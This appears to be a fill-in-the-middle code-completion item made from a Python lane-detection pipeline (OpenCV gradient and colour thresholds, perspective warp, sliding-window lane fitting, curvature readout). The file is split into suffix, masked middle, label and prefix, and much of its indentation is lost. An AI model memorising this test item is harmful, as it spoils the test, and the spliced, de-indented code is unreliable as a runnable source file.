out2=np.arange(400,350,-1)/400
#print(out2.shape)
out3=np.zeros(400)
#print(out3.shape)
out4=np.arange(800,850,1)/850
#print(out4.shape)
out5=np.ones(100)
#print(out5.shape)
out6 = np.arange(1100,950,-1)/1100
out7=np.zeros(180)
fin = np.concatenate((out, out1, out2,out3,out4,out5,out6,out7))
fin = np.expand_dims(fin,axis=1)
def abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=(0, 255)):
# Calculate directional gradient
# Apply threshold
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
if orient=='x':
sobel = cv2.Sobel(gray,cv2.CV_64F,1,0,ksize=sobel_kernel)
else:
sobel = cv2.Sobel(gray,cv2.CV_64F,0,1,ksize=sobel_kernel)
absolute = np.absolute(sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
grad_binary = np.zeros_like(scaled)
grad_binary[(scaled >= thresh[0])&(scaled <= thresh[1])] = 1
return grad_binary
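# --- Illustrative usage (not part of the pipeline) ---------------------------
# A minimal sketch of how the directional-gradient helper above can be applied to a
# single BGR frame. `frame` stands for any BGR image and the threshold values are
# placeholder examples, not the ones tuned for this project; the helper is defined
# here for illustration and never called by this script.
def _demo_abs_sobel_thresh(frame):
    gradx = abs_sobel_thresh(frame, orient='x', sobel_kernel=3, thresh=(20, 100))
    grady = abs_sobel_thresh(frame, orient='y', sobel_kernel=3, thresh=(20, 100))
    both = np.zeros_like(gradx)
    both[(gradx == 1) & (grady == 1)] = 1  # keep pixels with a strong gradient in both directions
    return both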
def mag_thresh(image, sobel_kernel=3, mag_thresh=(0, 255)):
# Calculate gradient magnitude
# Apply threshold
|
def dir_threshold(image, sobel_kernel=3, thresh=(0, np.pi/2)):
# Calculate gradient direction
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
absx = np.absolute(sobelx)
absy = np.absolute(sobely)
direction = np.arctan2(absy,absx)
dir_binary = np.zeros_like(gray_img)
dir_binary[(direction >= thresh[0])&(direction <= thresh[1])] = 1
return dir_binary
def hls_select(image,thresh=(0,255)):
hls = cv2.cvtColor(image,cv2.COLOR_BGR2HLS)
s = hls[:,:,2]
binary_output = np.zeros_like(s)
binary_output[(s>thresh[0])&(s<=thresh[1])]=1
return binary_output
def equalize(image):
image_yuv = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
#plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
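# --- Illustrative usage (not part of the pipeline) ---------------------------
# A small sketch showing how the HLS saturation threshold and the YUV luminance
# threshold above can be combined into a single binary mask; the threshold values
# are placeholders for illustration and this helper is never called below.
def _demo_color_mask(frame):
    s_mask = hls_select(frame, thresh=(151, 255))          # saturation picks out strongly coloured lane paint
    lum_mask = yuv_select_lumin(frame, thresh=(14, 255))   # luminance suppresses very dark shadow pixels
    mask = np.zeros_like(s_mask)
    mask[(s_mask == 1) & (lum_mask == 1)] = 1
    return mask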
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
    midpoint = int(histogram.shape[0]//2)  # np.int was removed in NumPy 1.24+; use the builtin int
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
    window_height = int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
                leftx_current = int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
                rightx_current = int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
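# --- Illustrative usage (not part of the pipeline) ---------------------------
# hist() has two modes: with win=True it runs a fresh sliding-window search seeded by
# the weighted column histogram of the bottom half of the warped binary image; with
# win=False it only searches within +/- searchmargin pixels of the previous polynomial
# fits (left_fit1/right_fit1). The sketch below assumes a 1280x720 bird's-eye binary
# image with values 0/1 (matching the weighting vector `fin` above) and is for
# illustration only -- it is not called by this script.
def _demo_lane_search(warped_binary):
    # First frame: no prior fits, so run the full sliding-window search.
    _, leftx, lefty, rightx, righty, _ = hist(warped_binary, [], [], win=True)
    left_fit_demo = np.polyfit(lefty, leftx, 2)
    right_fit_demo = np.polyfit(righty, rightx, 2)
    # Later frames: search around the previous fits instead of starting from scratch.
    return hist(warped_binary, left_fit_demo, right_fit_demo, win=False)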
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=(0.02, 1.57))
#s_binary = hls_select(img_undist,thresh=(212,255)) #98-255 works even in brighter areas
s_binary = hls_select(img_undist,thresh=(151,255)) #151
luminiscence = yuv_select_lumin(img_undist,thresh=(14,255))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1)) |(s_binary == 1)&(luminiscence==1)] = 1
#top left,bottom left,bottom right,top right
src = np.float32([[585-20, 460+10],[203-20, 720],[1127+30, 720],[695+30, 460+10]])
#src = np.float32([[620, 460-30],[203, 720],[1127, 720],[660, 460-30]])
points = np.int32(np.copy(src))
# cv2.polylines(img_undist,[points] ,True,(0,0,255),5)
#** Key here is keep the destination top boundary as closer as possible for effective transform**
dst = np.array([[320-20, 0],[320-20, 720],[960+30, 720],[960+30, 0]],dtype='float32')
img_size=(combined.shape[1],combined.shape[0])
M = cv2.getPerspectiveTransform(src,dst)
Minv = cv2.getPerspectiveTransform(dst,src)
warped = cv2.warpPerspective(combined,M,img_size,flags=cv2.INTER_LINEAR)
#Testing
output4 = np.dstack([warped*255,warped*255,warped*255])
output4 = cv2.resize(output4,(320, 180), interpolation = cv2.INTER_AREA)
#Testing ends
output3 = cv2.warpPerspective(final_img,M,img_size,flags=cv2.INTER_LINEAR)
output3 = cv2.resize(output3,(320, 180), interpolation = cv2.INTER_AREA)
#Testing
#cv2.imshow('warped',warped*255)
kernel = np.ones((320, 1),np.uint8)
warped1 = cv2.morphologyEx(warped.astype(np.uint8), cv2.MORPH_DILATE, kernel, iterations = 1)
warped = cv2.morphologyEx(warped1.astype(np.uint8), cv2.MORPH_ERODE, kernel, iterations = 1)
#cv2.imshow('warped1',warped*255)
#Testing ends
if((len(left_fit)==0 or len(right_fit)==0) or count==100 or validation_fails>5):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
validation_fails = 0
else:
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,False)
if(len(leftx)==0 or len(rightx)==0):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
ploty = np.linspace(0,warped.shape[0]-1,warped.shape[0])
left_fit = np.polyfit(lefty,leftx,2)
right_fit = np.polyfit(righty,rightx,2)
#Testing
t2 = right_fit[2]/left_fit[2]
t1 = right_fit[1]/left_fit[1]
t0 = right_fit[0]/left_fit[0]
#print(t2,t1,t0)
if(abs(t2) >20 or abs(t1)>20 or abs(t0)>20):
validation_fails+=1
if(len(prev_left_fit)!=0):
left_fit = prev_left_fit
if(len(prev_right_fit)!=0):
right_fit = prev_right_fit
print('valid fails')
prev_left_fit = np.copy(left_fit)
prev_right_fit = np.copy(right_fit)
#Testing ends
try:
leftfitx = left_fit[0]*ploty**2 + left_fit[1]*ploty+left_fit[2]
rightfitx = right_fit[0]*ploty**2+right_fit[1]*ploty+right_fit[2]
except TypeError:
print('The function failed to fit a line!')
final_out_img = np.copy(out_img).astype(np.uint8)
#testing
out_img[lefty,leftx] = [255,0,0]
out_img[righty,rightx] = [0,0,255]
#output4 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
leftpoints_draw = (np.asarray([leftfitx,ploty]).T).astype(np.int32)
rightpoints_draw = (np.asarray([rightfitx,ploty]).T).astype(np.int32)
#testing
# width = abs(np.max(leftpoints_draw) - np.max(rightpoints_draw))
# print(width)
cv2.polylines(out_img,[leftpoints_draw],False,(0,255,255),3)
cv2.polylines(out_img,[rightpoints_draw],False,(0,255,255),3)
#testing ends
        #**Drawing the lane on the image**
pts_left = np.array([np.transpose(np.vstack([leftfitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([rightfitx, ploty])))])
        #flipud reverses the right-lane points from top-to-bottom to bottom-to-top so that the stacked polygon corners are ordered anticlockwise.
pts = np.hstack((pts_left, pts_right))
#print(pts.shape)
#Testing
left_side_points_mean = np.mean(pts_left)
right_side_points_mean = np.mean(pts_right)
#Testing ends
#**Measuring Curvature radius**
y_eval = np.max(ploty)
ym_per_pixel = 30/720 #meters per pixel in y dimension
xm_per_pixel = 3.7/700 #meters per pixel in x dimension
#Testing
left_fit_0_metres = left_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
left_fit_1_metres = left_fit[1] * (xm_per_pixel / ym_per_pixel)
right_fit_0_metres = right_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
right_fit_1_metres = right_fit[1] * (xm_per_pixel / ym_per_pixel)
#Testing ends
left_curved = ((1 + (2*left_fit_0_metres*y_eval*ym_per_pixel + left_fit_1_metres)**2)**1.5)/(np.absolute(2*left_fit_0_metres))
right_curved = ((1 + (2*right_fit_0_metres*y_eval*ym_per_pixel + right_fit_1_metres)**2)**1.5)/(np.absolute(2*right_fit_0_metres))
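        # Radius of curvature for x = A*y^2 + B*y + C is R = (1 + (2*A*y + B)^2)^(3/2) / |2*A|.
        # The pixel-space coefficients are rescaled to metres above (A_m = A*xm/ym^2,
        # B_m = B*xm/ym) and the formula is evaluated at the bottom of the image,
        # i.e. at y = y_eval*ym_per_pixel.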
#print('left_curved: '+str(left_curved))
#print('right_curved: '+str(right_curved))
#testing
output2 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
cv2.fillPoly(final_out_img,np.int_([pts]),(0,255,0))
#cv2.imwrite('./test_images/test.jpg',combined*255)
newwarp = cv2.warpPerspective(final_out_img, Minv, (image.shape[1], image.shape[0]))
result = cv2.addWeighted(final_img, 1, newwarp, 0.3, 0)
vis = np.zeros((720, 1280 ,3),dtype=np.uint8)
vis[:720, :1280,:] = result
ltext = "left Curvature(m): " + str(round(left_curved,3))
rtext = "right Curvature(m): " + str(round(right_curved,3))
cent_out = round((left_side_points_mean + right_side_points_mean)/2,3)
distance_from_center = round(abs(img_size[0]/2 - cent_out)*xm_per_pixel,3)
cent = "Vehicle is left from center(m): " + str(distance_from_center)
cv2.putText(result,ltext,(200,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,rtext,(750,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,cent,(350,200),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
#cv2.imshow('result',result)
output1 = cv2.resize(combined*255,(320, 180), interpolation = cv2.INTER_AREA)
vis[:180, 0:320,:] = np.dstack([output1,output1,output1])
vis[:180, 320:640,:] = output2
vis[:180, 640:960,:] = output3
vis[:180, 960:1280,:] = output4
cv2.putText(vis,ltext,(200,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,rtext,(750,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,cent,(350,250),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.imshow('result',vis)
result1.write(result)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
result1.release()
cv2.destroyAllWindows() | gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
mag_sobel = np.sqrt((sobelx)**2 + (sobely)**2)
absolute = np.absolute(mag_sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
mag_binary = np.zeros_like(scaled)
mag_binary[(scaled >= mag_thresh[0])&(scaled <= mag_thresh[1])] = 1
return mag_binary | identifier_body |
Pipeline_for_videos.py | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 11 09:43:43 2020
@author: Admin
"""
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
import pickle
from moviepy.editor import *
fin=[]
out = np.arange(0,250)/250
#print(out.shape)
out1= np.ones(100)
#print(out1.shape)
out2=np.arange(400,350,-1)/400
#print(out2.shape)
out3=np.zeros(400)
#print(out3.shape)
out4=np.arange(800,850,1)/850
#print(out4.shape)
out5=np.ones(100)
#print(out5.shape)
out6 = np.arange(1100,950,-1)/1100
out7=np.zeros(180)
fin = np.concatenate((out, out1, out2,out3,out4,out5,out6,out7))
fin = np.expand_dims(fin,axis=1)
def abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=(0, 255)):
# Calculate directional gradient
# Apply threshold
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
if orient=='x':
sobel = cv2.Sobel(gray,cv2.CV_64F,1,0,ksize=sobel_kernel)
else:
sobel = cv2.Sobel(gray,cv2.CV_64F,0,1,ksize=sobel_kernel)
absolute = np.absolute(sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
grad_binary = np.zeros_like(scaled)
grad_binary[(scaled >= thresh[0])&(scaled <= thresh[1])] = 1
return grad_binary
def | (image, sobel_kernel=3, mag_thresh=(0, 255)):
# Calculate gradient magnitude
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
mag_sobel = np.sqrt((sobelx)**2 + (sobely)**2)
absolute = np.absolute(mag_sobel)
scaled = np.uint8(255*absolute/np.max(absolute))
mag_binary = np.zeros_like(scaled)
mag_binary[(scaled >= mag_thresh[0])&(scaled <= mag_thresh[1])] = 1
return mag_binary
def dir_threshold(image, sobel_kernel=3, thresh=(0, np.pi/2)):
# Calculate gradient direction
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
absx = np.absolute(sobelx)
absy = np.absolute(sobely)
direction = np.arctan2(absy,absx)
dir_binary = np.zeros_like(gray_img)
dir_binary[(direction >= thresh[0])&(direction <= thresh[1])] = 1
return dir_binary
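# --- Illustrative usage (not part of the pipeline) ---------------------------
# A minimal sketch combining the gradient-magnitude and gradient-direction thresholds
# defined above; the kernel sizes and threshold values are placeholders for
# illustration only, and this helper is never called by the script.
def _demo_mag_dir_mask(frame):
    mag_mask = mag_thresh(frame, sobel_kernel=3, mag_thresh=(30, 100))
    dir_mask = dir_threshold(frame, sobel_kernel=15, thresh=(0.7, 1.3))
    mask = np.zeros_like(dir_mask)
    mask[(mag_mask == 1) & (dir_mask == 1)] = 1
    return mask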
def hls_select(image,thresh=(0,255)):
hls = cv2.cvtColor(image,cv2.COLOR_BGR2HLS)
s = hls[:,:,2]
binary_output = np.zeros_like(s)
binary_output[(s>thresh[0])&(s<=thresh[1])]=1
return binary_output
def equalize(image):
image_yuv = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
#plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
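# Note: equalize() applies CLAHE (contrast-limited adaptive histogram equalisation) to
# the Y (luminance) channel only, which lifts local contrast in dark or washed-out
# frames without shifting colours. The call to it in the main loop below is currently
# commented out, so it has no effect on this pipeline as written.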
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
    midpoint = int(histogram.shape[0]//2)  # np.int was removed in NumPy 1.24+; use the builtin int
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
    window_height = int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
                leftx_current = int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
                rightx_current = int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=(0.02, 1.57))
#s_binary = hls_select(img_undist,thresh=(212,255)) #98-255 works even in brighter areas
s_binary = hls_select(img_undist,thresh=(151,255)) #151
luminiscence = yuv_select_lumin(img_undist,thresh=(14,255))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1)) |(s_binary == 1)&(luminiscence==1)] = 1
#top left,bottom left,bottom right,top right
src = np.float32([[585-20, 460+10],[203-20, 720],[1127+30, 720],[695+30, 460+10]])
#src = np.float32([[620, 460-30],[203, 720],[1127, 720],[660, 460-30]])
points = np.int32(np.copy(src))
# cv2.polylines(img_undist,[points] ,True,(0,0,255),5)
#** Key here is keep the destination top boundary as closer as possible for effective transform**
dst = np.array([[320-20, 0],[320-20, 720],[960+30, 720],[960+30, 0]],dtype='float32')
img_size=(combined.shape[1],combined.shape[0])
M = cv2.getPerspectiveTransform(src,dst)
Minv = cv2.getPerspectiveTransform(dst,src)
warped = cv2.warpPerspective(combined,M,img_size,flags=cv2.INTER_LINEAR)
#Testing
output4 = np.dstack([warped*255,warped*255,warped*255])
output4 = cv2.resize(output4,(320, 180), interpolation = cv2.INTER_AREA)
#Testing ends
output3 = cv2.warpPerspective(final_img,M,img_size,flags=cv2.INTER_LINEAR)
output3 = cv2.resize(output3,(320, 180), interpolation = cv2.INTER_AREA)
#Testing
#cv2.imshow('warped',warped*255)
kernel = np.ones((320, 1),np.uint8)
warped1 = cv2.morphologyEx(warped.astype(np.uint8), cv2.MORPH_DILATE, kernel, iterations = 1)
warped = cv2.morphologyEx(warped1.astype(np.uint8), cv2.MORPH_ERODE, kernel, iterations = 1)
#cv2.imshow('warped1',warped*255)
#Testing ends
if((len(left_fit)==0 or len(right_fit)==0) or count==100 or validation_fails>5):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
validation_fails = 0
else:
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,False)
if(len(leftx)==0 or len(rightx)==0):
histogram_img,leftx,lefty,rightx,righty,out_img = hist(warped,left_fit,right_fit,True)
count=0
ploty = np.linspace(0,warped.shape[0]-1,warped.shape[0])
left_fit = np.polyfit(lefty,leftx,2)
right_fit = np.polyfit(righty,rightx,2)
#Testing
t2 = right_fit[2]/left_fit[2]
t1 = right_fit[1]/left_fit[1]
t0 = right_fit[0]/left_fit[0]
#print(t2,t1,t0)
if(abs(t2) >20 or abs(t1)>20 or abs(t0)>20):
validation_fails+=1
if(len(prev_left_fit)!=0):
left_fit = prev_left_fit
if(len(prev_right_fit)!=0):
right_fit = prev_right_fit
print('valid fails')
prev_left_fit = np.copy(left_fit)
prev_right_fit = np.copy(right_fit)
#Testing ends
try:
leftfitx = left_fit[0]*ploty**2 + left_fit[1]*ploty+left_fit[2]
rightfitx = right_fit[0]*ploty**2+right_fit[1]*ploty+right_fit[2]
except TypeError:
print('The function failed to fit a line!')
final_out_img = np.copy(out_img).astype(np.uint8)
#testing
out_img[lefty,leftx] = [255,0,0]
out_img[righty,rightx] = [0,0,255]
#output4 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
leftpoints_draw = (np.asarray([leftfitx,ploty]).T).astype(np.int32)
rightpoints_draw = (np.asarray([rightfitx,ploty]).T).astype(np.int32)
#testing
# width = abs(np.max(leftpoints_draw) - np.max(rightpoints_draw))
# print(width)
cv2.polylines(out_img,[leftpoints_draw],False,(0,255,255),3)
cv2.polylines(out_img,[rightpoints_draw],False,(0,255,255),3)
#testing ends
        #**Drawing the lane on the image**
pts_left = np.array([np.transpose(np.vstack([leftfitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([rightfitx, ploty])))])
        #flipud reverses the right-lane points from top-to-bottom to bottom-to-top so that the stacked polygon corners are ordered anticlockwise.
pts = np.hstack((pts_left, pts_right))
#print(pts.shape)
#Testing
left_side_points_mean = np.mean(pts_left)
right_side_points_mean = np.mean(pts_right)
#Testing ends
#**Measuring Curvature radius**
y_eval = np.max(ploty)
ym_per_pixel = 30/720 #meters per pixel in y dimension
xm_per_pixel = 3.7/700 #meters per pixel in x dimension
#Testing
left_fit_0_metres = left_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
left_fit_1_metres = left_fit[1] * (xm_per_pixel / ym_per_pixel)
right_fit_0_metres = right_fit[0] * (xm_per_pixel / (ym_per_pixel**2))
right_fit_1_metres = right_fit[1] * (xm_per_pixel / ym_per_pixel)
#Testing ends
left_curved = ((1 + (2*left_fit_0_metres*y_eval*ym_per_pixel + left_fit_1_metres)**2)**1.5)/(np.absolute(2*left_fit_0_metres))
right_curved = ((1 + (2*right_fit_0_metres*y_eval*ym_per_pixel + right_fit_1_metres)**2)**1.5)/(np.absolute(2*right_fit_0_metres))
#print('left_curved: '+str(left_curved))
#print('right_curved: '+str(right_curved))
